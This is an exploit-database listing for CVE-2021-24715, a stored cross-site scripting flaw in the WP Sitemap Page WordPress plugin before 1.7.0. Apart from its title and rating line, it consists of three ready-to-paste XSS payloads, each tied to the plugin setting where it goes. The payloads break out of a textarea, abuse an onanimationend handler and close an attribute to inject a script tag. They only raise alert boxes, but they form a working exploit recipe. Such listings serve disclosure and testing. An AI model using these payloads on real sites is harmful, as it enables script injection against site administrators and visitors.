Exploit for WP Sitemap Page < 1.7.0 - Admin+ Stored Cross Site Scripting CVE-2021-24715

Name: Exploit for WP Sitemap Page < 1.7.0 - Admin+ Stored Cross Site Scripting CVE-2021-24715
Rating: 5 (282 reviews)

2021-09-07 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:DA66D54E-DDA8-4AA8-8D27-B8B87100BB21
Put the following payloads in the mentioned settings of the plugin:
- How to display the posts (backend XSS, v < 1.6.5): </textarea><svg/onload=confirm('XSS')>
- How to display the posts (frontend XSS, v < 1.6.6): <a style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS/)" href="{permalink}">{title}</a>
- Exclude pages (backend XSS, v < 1.7.0): "><script>alert(/XSS/)</script>